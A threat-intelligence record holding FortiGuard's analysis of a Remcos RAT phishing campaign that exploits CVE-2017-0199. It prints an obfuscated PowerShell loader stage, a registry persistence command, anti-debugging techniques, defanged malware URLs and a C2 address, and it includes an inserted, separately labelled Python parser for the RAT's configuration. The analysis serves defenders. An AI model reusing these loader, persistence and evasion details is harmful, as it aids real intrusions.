{
	"id": "733b43d5-d8f1-4516-81b1-e31ba162552d",
	"created_at": "2026-04-06T00:17:53.047392Z",
	"updated_at": "2026-04-10T13:12:17.231343Z",
	"deleted_at": null,
	"sha1_hash": "1bc6a7fd93e4cc82b67e912b07942b1a79707f5c",
	"title": "New Campaign Uses Remcos RAT to Exploit Victims | FortiGuard Labs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2686430,
	"plain_text": "New Campaign Uses Remcos RAT to Exploit Victims | FortiGuard\r\nLabs\r\nBy Xiaopeng Zhang\r\nPublished: 2024-11-08 · Archived: 2026-04-02 11:15:01 UTC\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: Windows Users\r\nImpact: Fully remotely control a victim’s computer\r\nSeverity level: High\r\nFortinet’s FortiGuard Labs recently noticed a phishing campaign in the wild. It starts with a phishing email\r\ncontaining a malicious Excel document. Upon researching the campaign, I found it was spreading a new variant of\r\nthe Remcos RAT.\r\nOverview\r\nRemcos is a commercial RAT (remote administration tool) sold online. It provides purchasers with a wide range of\r\nadvanced features to remotely control computers belonging to the buyer. However, threat actors have abused\r\nRemcos to collect sensitive information from victims and remotely control their computers to perform further\r\nmalicious acts.\r\nFigure 1 displays the Remcos webpage.\r\nFigure 1: Remcos RAT software is sold online\r\nhttps://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims\r\nPage 1 of 24\n\nIn this security blog, I will show how Remcos is delivered to a victim’s device, what kinds of anti-analysis\r\ntechniques it leverages to protect itself from being analyzed, how this variant of Remcos is deployed, how it\r\nachieves persistence on the victim’s device, and what advanced features Remcos provides to remotely control a\r\nvictim’s device.\r\nThe Phishing Email\r\nFigure 2: The phishing email\r\nThe phishing email is shown in Figure 2. It contains an attached malicious Excel file disguised as an order file to\r\nconvince the recipient to open the document.\r\nCVE-2017-0199 Exploited by the Excel Document\r\nCVE-2017-0199 is a Remote Code Execution vulnerability in the way Microsoft Office and WordPad parse\r\nspecially crafted files.
Once the recipient opens the attached file, Excel displays the file content, as\r\nseen in Figure 3.\r\nFigure 3: The file opened in Excel\r\nIn the background, CVE-2017-0199 is exploited to download an HTA file and execute it on the\r\nrecipient’s device.\r\nThe vulnerability is triggered by a crafted embedded OLE object. Figure 4 shows the content of\r\nthe crafted embedded OLE object (the “\\x01Ole” stream).\r\nFigure 4: The crafted OLE object with a URL\r\nExcel accesses the short URL “hxxps://og1[.]in/2Rxzb3,” which redirects to\r\n“hxxp://192[.]3[.]220[.]22/xampp/en/cookienetbookinetcahce.hta”. Figure 5 is a Wireshark screenshot of the\r\ndownload.\r\nFigure 5: The downloaded HTA file\r\nThe HTA file is an HTML Application file. It is executed by a Windows-native application (mshta.exe) that\r\nExcel launches through DCOM.\r\nMultiple Script Languages\r\nIts code is wrapped in multiple layers using different script languages and encoding methods, including\r\nJavaScript, VBScript, Base64 encoding, URL encoding, and PowerShell, to protect itself from detection and\r\nanalysis.\r\nFigure 6: Examples of multiple script code\r\nFigure 6 shows some script code examples. These are executed when the downloaded HTA file is parsed by\r\nmshta.exe.\r\nTake a look at the PowerShell code at the bottom of Figure 6.
It calls the API URLDownloadToFile() to download\r\nan EXE file from the URL “hxxp://192[.]3[.]220[.]22/430/dllhost.exe” into a local file,\r\n“%AppData%\\dllhost.exe.”\r\nExecuting “STaRt $EnV:APPDATA\\dllhost.exe” then starts the downloaded EXE file on the victim’s device.\r\nStarting the Downloaded EXE\r\nOnce the downloaded EXE file, dllhost.exe, starts, it extracts a batch of files into the %AppData% folder. Figure 7\r\nis a screenshot of the extracted files and sub-folders located in\r\n%AppData%\\intercessionate\\Favourablies117\\sulfonylurea. Some of the key data is hidden in these files.\r\nFigure 7: Screenshot of partially extracted files\r\ndllhost.exe then runs PowerShell by calling the API CreateProcessW() to execute a piece of\r\nPowerShell code, as illustrated in Figure 8.\r\nFigure 8: dllhost.exe about to run the PowerShell program\r\nSince dllhost.exe is a 32-bit process, it runs the 32-bit PowerShell,\r\n“C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe.” This is important because the malicious\r\ncode only works in a 32-bit PowerShell process.\r\nThe PowerShell code breaks down as follows.\r\n$krjning=Get-Content -Raw '%AppData%\\intercessionate\\Favourablies117\\sulfonylurea\\Aerognosy.Res';\r\n$Lukewarmly95=$krjning.SubString(5322,3);\r\n.$Lukewarmly95($krjning)\r\nIt reads the content of “Aerognosy.Res,” one of the extracted files, into the variable “$krjning,” which holds a\r\nPowerShell script. SubString(5322,3) returns “iEx” (three characters taken from the script text itself), the alias of\r\nInvoke-Expression, which runs a string as a command or expression.
Finally, “.$Lukewarmly95($krjning)” invokes “iEx” on the entire PowerShell script read from “Aerognosy.Res.”\r\nAgain, this PowerShell code is thoroughly obfuscated and encoded. Based on my research on the code, I\r\ndiscovered it performs the following functions:\r\nCopies dllhost.exe to %temp% and renames it “Vaccinerende.exe.”\r\nHides the current PowerShell process in the background.\r\nLoads malicious code from the extracted “Valvulate.Cru” file.\r\nDeploys the malicious code in memory by calling the APIs VirtualAlloc() and MemoryCopy().\r\nExecutes the malicious code’s entry point by calling the API CallWindowProcA(), as listed in Figure 9.\r\nFigure 9: Debugging the de-obfuscated PowerShell code from Aerognosy.Res\r\nMalicious Code Runs Inside the PowerShell Process\r\nSelf-decrypting the malicious code:\r\nAs I mentioned, the loaded malicious code relies on a 32-bit version of PowerShell. It first runs a piece of self-decryption code mixed with a huge amount of junk instructions, which makes analysis considerably harder. Figure 10\r\npresents the end of the decrypting code, where it is about to execute the “call edi” instruction. The EDI register\r\nnow points to the decrypted code, as shown on the right.\r\nFigure 10: About to call the decrypted code\r\nIt leverages numerous complicated anti-analysis techniques to protect itself from being analyzed.\r\nAnti-Analysis Techniques:\r\n1.  It installs a vectored exception handler.\r\nWhenever an exception occurs, the handler is invoked. Based on the exception code, it adjusts the thread context\r\nso that execution resumes at a different offset. There are numerous exception-raising instructions\r\ninside the malicious code.
In other words, exception handling drives the control flow of the entire code.\r\nFigure 11 shows an instruction at 0xEE16222 that raises an exception (code 0x80000003, a breakpoint exception),\r\nwhich the exception handler then catches and handles.\r\nFigure 11: Example of an exception\r\nThe exception handler function also checks the debug registers Dr0, Dr1, Dr2, Dr3,\r\nDr4, Dr5, Dr6, and Dr7. Their values are non-zero when a debugger has set hardware breakpoints.\r\n2.  System APIs are resolved dynamically and called in an unusual way.\r\nThere are no API name strings in the code. Instead, it keeps hashes of the API names. Whenever\r\nit calls an API, a dedicated function walks the loaded modules from the PEB (pointed to by\r\nfs:[30h] in a 32-bit process) and matches the name hash to obtain the function address. This raises the difficulty of\r\nstatic analysis.\r\nIn addition, another function is called every time an API is called. This function detects whether a debugger\r\nhas placed a breakpoint on the API.\r\nIt also re-encrypts the code between the caller’s return address and the base address, wiping the code that has\r\njust executed.\r\n3.  It calls ZwSetInformationThread() for anti-debugging.\r\nFigure 12: It breaks on the API ZwSetInformationThread()\r\nThe malicious code calls ZwSetInformationThread() with the ThreadHideFromDebugger (0x11) information class\r\nand the current thread pseudo-handle (0xFFFFFFFE). This Windows mechanism conceals a thread from attached\r\ndebuggers. Figure 12 illustrates the call with its arguments.\r\nIf a debugger is attached to the current process, the process terminates as soon as this API is called.\r\n4.  It checks the result of ZwQueryInformationProcess().\r\nIt calls ZwQueryInformationProcess() with the ProcessDebugPort (7) information class. A non-zero DebugPort\r\nmeans a debugger is attached to the current process (powershell.exe).\r\n5.  All constant values are computed at run time.\r\nA code snippet in the original post shows how it splits “mov ebx, 100h” into three instructions.\r\n6.  It uses an API hooking technique against several APIs.\r\nThe malicious code emulates the first few instructions of an API (say, two) itself and then\r\njumps into the API past them (starting at the third instruction).\r\nThe original post shows an example for CreateProcessInternalW() with the emulated instructions highlighted; this\r\ndefeats any breakpoint or inline hook placed at the API entry.\r\nWhenever any of the above detection conditions are triggered, the current process (powershell.exe) can become\r\nunresponsive, crash, or exit unexpectedly.\r\nProcess Hollowing (Malicious Code into Vaccinerende.exe):\r\nFigure 13: Display of CreateProcessInternal() and its parameters\r\nThe malicious code performs process hollowing to inject itself into a newly created Vaccinerende.exe process\r\n(copied from dllhost.exe). To do this, it calls CreateProcessInternalW() with the creation flag\r\nCREATE_SUSPENDED (0x4), so the new process starts suspended. It then calls related\r\nAPIs to transfer all the malicious code into the new process and run it.\r\nThe relevant APIs are NtAllocateVirtualMemory(), ZwCreateSection(), NtMapViewOfSection(),\r\nNtGetContextThread(), NtSetContextThread(), and NtResumeThread().\r\nMalicious Code Runs inside Vaccinerende.exe\r\nIt performs all the anti-analysis checks described in the section above and then follows a workflow different from\r\nthe one in the PowerShell process.\r\nAccording to my research, it performs three tasks: maintaining persistence, downloading and decrypting the\r\nRemcos payload, and starting Remcos in memory.\r\nMaintaining Persistence:\r\nThe malicious code adds a new auto-run item to the system registry to maintain persistence and keep control\r\nof the victim’s device after it is restarted.\r\nFigure 14 shows the malicious code as it is about to run reg.exe to add the auto-run item and\r\nhow the item appears in the Registry Editor. It calls the API ShellExecuteW() to run cmd.exe with the command line\r\n/c REG ADD HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /f /v \"Chivey57\" /t\r\nREG_EXPAND_SZ /d \"%Misbehavers% -windowstyle 1 $Frligheden=(gp -Path\r\n'HKCU:\\Software\\Roscoelite\\').Aftvttedes;%Misbehavers% ($Frligheden).\"\r\nFigure 14: Adding an auto-run item in the system registry\r\n“%Misbehavers%” is an environment variable the malware defines as the full path to the 32-bit powershell.exe.
The auto-run command reads a piece of PowerShell code, identical to the code that dllhost.exe executes, from the\r\nstring value “Aftvttedes” under HKCU\\Software\\Roscoelite and passes it to powershell.exe as its command.\r\nDownloading and running Remcos:\r\nNext, the malicious code downloads an encrypted file from the URL\r\n“hxxp://192[.]3[.]220[.]22/hFXELFSwRHRwqbE214.bin.” The file contains the encrypted Remcos malware.\r\nTo download the file, the APIs InternetOpenA(), InternetOpenUrlA(), and InternetReadFile() are\r\ncalled in sequence.\r\nAfter decrypting the downloaded file, I found a new variant of Remcos. Rather than saving Remcos to a\r\nlocal file and running it, the loader deploys Remcos directly in the memory of the current process (Vaccinerende.exe). In other\r\nwords, it is a fileless variant of Remcos.\r\nIt then starts Remcos on a new thread whose thread function (StartAddress) is the Remcos entry point. To start the thread, it\r\ncalls the undocumented API NtCreateThreadEx(). Figure 15 shows a screenshot of the debugger as it is about to\r\ncall the API to start Remcos.\r\nFigure 15: Starting the Remcos payload in a thread\r\nInitializing Remcos\r\nEach Remcos variant has a setting block with a batch of configuration values that control how Remcos operates on the\r\nvictim’s device. The setting block is stored encrypted in a resource named “SETTINGS”; Remcos decrypts it\r\nat startup and initializes itself from it.\r\nLook at Figure 16 to examine the decrypted setting block in memory.\r\nFigure 16: Memory view of the decrypted setting block\r\nThe setting block has 57 values in total, which are separated by “\\x7C\\x1E\\x1E\\x1F\\x7C”, as illustrated in Figure\r\n16. The values in the setting block are retrieved by their index, from 0 to 56, through a dedicated accessor function.\r\nThe setting values tell Remcos how to do its work on the victim’s device, including the C\u0026C server IP address and\r\nport, Remcos’ name, Remcos’ mutex name (also the registry key name), a Remcos license number, the keylogger’s\r\nlocal log file, a couple of certificates used to verify and communicate with the C\u0026C server, and several switch\r\nflags indicating whether a feature is enabled or disabled, such as Keylogger, Screenshot, Watchdog, Record audio,\r\nReset browsers’ login, and more.\r\nThe C\u0026C server IP\u0026Port string at index 0 is “107[.]173[.]4[.]16:2404:1,” where “107[.]173[.]4[.]16” is the IP\r\naddress, “2404” is the TCP port, and the trailing “1” means that TLS is enabled for communication with the C\u0026C server.\r\nRemcos collects some basic information from the victim’s device. It then encrypts and sends the collected data to\r\nits C\u0026C server to register that the victim’s device is online and ready to be controlled. This is the first command\r\npacket sent to the C\u0026C server.\r\nFigure 17: Example of the register packet with some basic information\r\nThe memory dump in Figure 17 shows the content of the register packet (command ID 4Bh) just before it is\r\nencrypted.\r\nWhen TLS is enabled (as set in the setting block), packets follow the same structure whether sent or\r\nreceived. Each packet consists of Packet Magic (like 0xFF0424) + Command Data Size (like 0x2C6) +\r\nCommand ID (like 0x4B) + Command Data + Packet Type (like 0x17, 0x16, and 0x15).\r\nI will break down the command data of the 4Bh command to explain what basic information Remcos collects from the\r\nvictim’s device.
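Both the decrypted setting block and the 4Bh registration data are delimited by the same five-byte separator, so one small parser covers both. The following Python is an added example written for this edit, not code from the FortiGuard post or from Remcos itself. Only the separator, the 57-value count, the index-0 C2 string format and the order of the registration items come from the article; the sample blobs are constructed, the field names are invented labels, and treating each listed registration item as exactly one separated field is an assumption.

```python
# Added example (not code from the FortiGuard article or from Remcos itself).
# Splits a Remcos-style setting block and 4Bh registration data on the
# separator the article documents, parses the index-0 C2 string, and labels
# the registration fields in the order the article lists them.
# Sample inputs below are constructed; only the separator, the C2 string
# format and the field order come from the article.
from __future__ import annotations
from dataclasses import dataclass

# Field separator from the article: bytes 7C 1E 1E 1F 7C.
SEPARATOR = bytes([0x7C, 0x1E, 0x1E, 0x1F, 0x7C])
SETTINGS_FIELD_COUNT = 57  # indices 0..56 per the article

# Order of the items the article lists for the 4Bh registration command data.
# Assumption: each item is exactly one separated field, and these names are
# labels chosen here, not names used by Remcos.
REGISTER_FIELDS = (
    'cpu', 'memory', 'privilege', 'location', 'file_type_path_install_time',
    'remcos_name', 'c2_ip', 'uptime_ms', 'idle_time', 'keylog_path',
    'active_window', 'host_and_user', 'version', 'os',
)


@dataclass(frozen=True)
class C2Endpoint:
    host: str
    port: int
    tls: bool


def split_fields(blob: bytes) -> list[str]:
    '''Split a separator-delimited blob into text fields (latin-1 keeps every byte).'''
    return [part.decode('latin-1') for part in blob.split(SEPARATOR)]


def parse_c2(field: str) -> C2Endpoint:
    '''Parse the index-0 string <ip>:<port>:<flag>; flag 1 means TLS is enabled.'''
    host, port, flag = field.rsplit(':', 2)
    if not 0 < int(port) < 65536:
        raise ValueError(f'bad C2 port: {port}')
    return C2Endpoint(host=host, port=int(port), tls=flag == '1')


def parse_settings(blob: bytes) -> tuple[C2Endpoint, list[str]]:
    '''Decode a decrypted setting block; return the C2 endpoint and all 57 values.'''
    fields = split_fields(blob)
    if len(fields) != SETTINGS_FIELD_COUNT:
        raise ValueError(f'expected {SETTINGS_FIELD_COUNT} settings, got {len(fields)}')
    return parse_c2(fields[0]), fields


def parse_register_data(blob: bytes) -> dict[str, str]:
    '''Label the 4Bh command data by position, using the order from the article.'''
    fields = split_fields(blob)
    if len(fields) != len(REGISTER_FIELDS):
        raise ValueError(f'expected {len(REGISTER_FIELDS)} fields, got {len(fields)}')
    return dict(zip(REGISTER_FIELDS, fields))


def defang(host: str) -> str:
    '''Render an IP or hostname safely for a report: 107.173.4.16 -> 107[.]173[.]4[.]16'''
    return host.replace('.', '[.]')


def build_sample_settings() -> bytes:
    '''Constructed setting block: index 0 uses the C2 string format, the rest is filler.'''
    values = ['107.173.4.16:2404:1'] + [f'setting{i}' for i in range(1, SETTINGS_FIELD_COUNT)]
    return SEPARATOR.join(v.encode('latin-1') for v in values)


def build_sample_register_data() -> bytes:
    '''Constructed 4Bh command data with one value per item listed in the article.'''
    values = [
        'Intel(R) Core(TM) CPU', '8191 MB total, 6000 MB free', 'Admin', 'US',
        'EXE|C:/Users/victim/AppData/Roaming/dllhost.exe|2024-11-01',
        'Rmc-DSGECX', '107.173.4.16', '3600000', '120',
        'C:/Users/victim/AppData/Roaming/keylog.dat', 'Untitled - Notepad',
        'DESKTOP-1|victim', '5.1.2 Pro', 'Windows 10 Enterprise (64 bit)',
    ]
    return SEPARATOR.join(v.encode('latin-1') for v in values)


if __name__ == '__main__':
    c2, settings = parse_settings(build_sample_settings())
    print(f'C2 {defang(c2.host)}:{c2.port} tls={c2.tls}, {len(settings)} settings')
    for name, value in parse_register_data(build_sample_register_data()).items():
        print(f'{name:>28}: {value}')
```

In practice the input to parse_settings() is the decrypted “SETTINGS” resource dumped from memory (Figure 16), and the input to parse_register_data() is the 4Bh command data captured before encryption (Figure 17); the strict field-count checks make the parser fail loudly on a variant whose layout differs from the one described here.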
The command data contains many separators (“\\x7C\\x1E\\x1E\\x1F\\x7C”) that delimit the collected\r\nbasic information:\r\nThe processor’s information.\r\nThe memory status.\r\nThe user’s privilege level.\r\nThe location of the victim’s device.\r\nRemcos’ file type (“EXE”), its full path on the victim’s device, and the installation time.\r\nRemcos’ assigned name, “Rmc-DSGECX,” which is defined in the setting block.\r\nThe IP address of the C\u0026C server.\r\nThe device’s uptime since its last boot, obtained by calling the API GetTickCount().\r\nThe idle time of the victim’s device.\r\nThe Remcos keylogger’s local file path.\r\nThe title of the active program on the device.\r\nThe device name and user name of the affected device.\r\nThe version of this variant of Remcos, which is the hardcoded string “5.1.2 Pro”.\r\nThe OS information, “Windows 10 Enterprise (64 bit).”\r\nFeatures and Control Commands\r\nAfter registering the victim’s device on the C\u0026C server, Remcos receives control command packets from the server to\r\nperform further work on the victim’s device.
These features and the corresponding commands are detailed below.\r\nAs an example, control command 06h asks Remcos for the list of all running processes on the victim’s device.\r\nRemcos replies with a 4Fh command packet carrying the collected process list, consisting of each process name, PID,\r\narchitecture (64-bit or 32-bit), and full path, as shown in Figure 18.\r\nFigure 18: Send process list to C2 server\r\nFigure 19 is a screenshot of the C\u0026C server view of the process list.\r\nFigure 19: Process Manager on the C\u0026C server\r\nRemcos includes a function that parses the control command data received from the server and then performs the\r\ncorresponding action on the victim’s device.\r\nMy analysis of this function shows that Remcos has the features and commands listed in the chart in the original\r\npost (an image that is not reproduced in this text).\r\nSummary\r\nIn this analysis, I walked through the entire process of the phishing campaign. It begins with a phishing email with\r\nan attached Excel document containing a crafted OLE object. This disguised email is used to trick the recipient into opening the attached\r\nExcel document.\r\nThe CVE-2017-0199 vulnerability is exploited once the Excel file is opened on the victim’s device. It then\r\ndownloads an HTA file and executes it on the device.
Multiple script languages are leveraged to download an\r\nEXE file (dllhost.exe), which then starts the 32-bit PowerShell process to load the malicious code from extracted\r\nfiles and execute it in the PowerShell process.\r\nNext, I explained what anti-analysis techniques are used in the code, such as a vectored exception handler,\r\ndynamically resolved APIs, run-time-computed constants, the APIs ZwSetInformationThread() and\r\nZwQueryInformationProcess(), and API hooking.\r\nAfter passing the checks introduced in the anti-analysis part, it performs process hollowing to run the\r\nmalicious code in the new process “Vaccinerende.exe,” which not only establishes persistence on the victim’s device\r\nbut also downloads and decrypts the Remcos payload.\r\nI then elaborated on how it keeps Remcos in memory and starts its entry point function in a thread (API\r\nNtCreateThreadEx()).\r\nSubsequently, I explained how Remcos works with its setting block on the victim’s device, how Remcos\r\ncommunicates with its C\u0026C server, and what the format of the traffic packets looks like.\r\nFinally, I focused on introducing the features this Remcos variant can perform on the victim’s device and listing\r\nthe relevant control commands for each feature.\r\nFigure 20 shows the entire process of the phishing campaign.\r\nFigure 20: Workflow of the entire phishing campaign\r\nFortinet Protections\r\nFortinet customers are already protected from this campaign by FortiGuard’s AntiSPAM, Web Filtering, IPS,\r\nand AntiVirus services as follows:\r\nThe relevant URLs are rated as “Malicious Websites” by the FortiGuard Web Filtering service.\r\nFortiMail recognizes the phishing email as “virus detected.” In addition, real-time anti-phishing provided by\r\nFortiSandbox embedded in Fortinet’s FortiMail, web filtering, and antivirus solutions offers advanced
protection\r\nagainst both known and unknown phishing attempts.\r\nThe FortiGuard IPS service detects the exploit against CVE-2017-0199 with the signature\r\n“MS.Office.OLE.autolink.Code.Execution”.\r\nThe FortiGuard Antivirus service detects the original Excel document, the HTA file, the downloaded executable file,\r\nthe data/script files, and the Remcos executable with the following AV signatures:\r\nMSExcel/CVE-2017-0199.REM!exploit\r\nJS/Remcos.CB!tr.dldr\r\nPowerShell/Remcos.SER!tr\r\nData/Remcos.LAV!tr\r\nW32/Remcos.LD!tr\r\nFortiGate, FortiMail, FortiClient, and FortiEDR support the FortiGuard AntiVirus service. The FortiGuard\r\nAntiVirus engine is part of each solution. As a result, customers who have these products with up-to-date\r\nprotections are already protected.\r\nThe FortiGuard CDR (content disarm and reconstruction) service can disarm the embedded link object inside the\r\nExcel document.\r\nTo stay informed of new and emerging threats, you can sign up to receive future alerts.\r\nWe also suggest our readers go through the free NSE training: NSE 1 – Information Security Awareness, a module\r\non Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, please contact our Global\r\nFortiGuard Incident Response Team.\r\nIOCs\r\nURLs:\r\nhxxps://og1[.]in/2Rxzb3\r\nhxxp://192[.]3[.]220[.]22/xampp/en/cookienetbookinetcahce.hta\r\nhxxp://192[.]3[.]220[.]22/hFXELFSwRHRwqbE214.bin\r\nhxxp://192[.]3[.]220[.]22/430/dllhost.exe\r\nC2 server:\r\n107[.]173[.]4[.]16:2404\r\nRelevant Sample
SHA-256:\r\n[PO-9987689987.xls]\r\n4A670E3D4B8481CED88C74458FEC448A0FE40064AB2B1B00A289AB504015E944\r\n[cookienetbookinetcahce.hta]\r\nF99757C98007DA241258AE12EC0FD5083F0475A993CA6309811263AAD17D4661\r\n[dllhost.exe / Vaccinerende.exe]\r\n9124D7696D2B94E7959933C3F7A8F68E61A5CE29CD5934A4D0379C2193B126BE\r\n[Aerognosy.Res]\r\nD4D98FDBE306D61986BED62340744554E0A288C5A804ED5C924F66885CBF3514\r\n[Valvulate.Cru]\r\nF9B744D0223EFE3C01C94D526881A95523C2F5E457F03774DD1D661944E60852\r\n[Remcos / Decrypted hFXELFSwRHRwqbE214.bin]\r\n24A4EBF1DE71F332F38DE69BAF2DA3019A87D45129411AD4F7D3EA48F506119D\r\nSource: https://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims"
	],
	"report_names": [
		"new-campaign-uses-remcos-rat-to-exploit-victims"
	],
	"threat_actors": [
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434673,
	"ts_updated_at": 1775826737,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/1bc6a7fd93e4cc82b67e912b07942b1a79707f5c.pdf",
		"text": "https://archive.orkl.eu/1bc6a7fd93e4cc82b67e912b07942b1a79707f5c.txt",
		"img": "https://archive.orkl.eu/1bc6a7fd93e4cc82b67e912b07942b1a79707f5c.jpg"
	}
}